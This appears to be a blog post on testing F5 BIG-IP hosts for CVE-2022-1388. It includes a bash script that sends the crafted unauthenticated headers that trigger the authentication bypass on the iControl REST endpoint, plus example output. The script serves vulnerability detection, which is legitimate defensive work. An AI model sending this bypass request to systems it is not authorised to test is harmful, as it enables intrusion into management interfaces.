Testing for F5 Networks BIG-IP vulnerability (CVE-2022-1388)

CVE-2022-1388 is a critical vulnerability (CVSS 9.8) in the management interface of F5 Networks’ BIG-IP solution that enables an unauthenticated attacker to gain remote code execution on the system through bypassing F5’s iControl REST authentication. The vulnerability was disclosed publicly on 4 May 2022.

• https://arstechnica.com/information-technology/2022/05/hackers-are-actively-exploiting-big-ip-vulnerability-with-a-9-8-severity-rating/.

A bash script to test for CVE-2022-1388 was published at https://www.randori.com/blog/vulnerability-analysis-cve-2022-1388/. I modified the sample script to accept a target IP or FQDN as a command line argument, as follows:

#!/bin/bash
# cve-2022-1388-test.sh -- CVE-2022-1388 test script
# 2022-05-11

HOST=$1

if curl -s https://$HOST/mgmt/tm --insecure \
	-H "Authorization: Basic YWRtaW46" \
	-H "X-F5-Auth-Token: 1" \
	-H "Connection: X-Forwarded-Host, X-F5-Auth-Token" \
	-H "Content-Length: 0" |
	grep -q "\"items\":\["; then
	printf "\n[*] $HOST is vulnerable\n"
else
	printf "\n[*] $HOST doesn't appear vulnerable\n"
fi

Example usage:

❯ ./cve-2022-1388-test.sh 10.0.0.39
[*] 10.0.0.39 doesn't appear vulnerable


❯ ./cve-2022-1388-test.sh 10.0.0.40
[*] 10.0.0.40 is vulnerable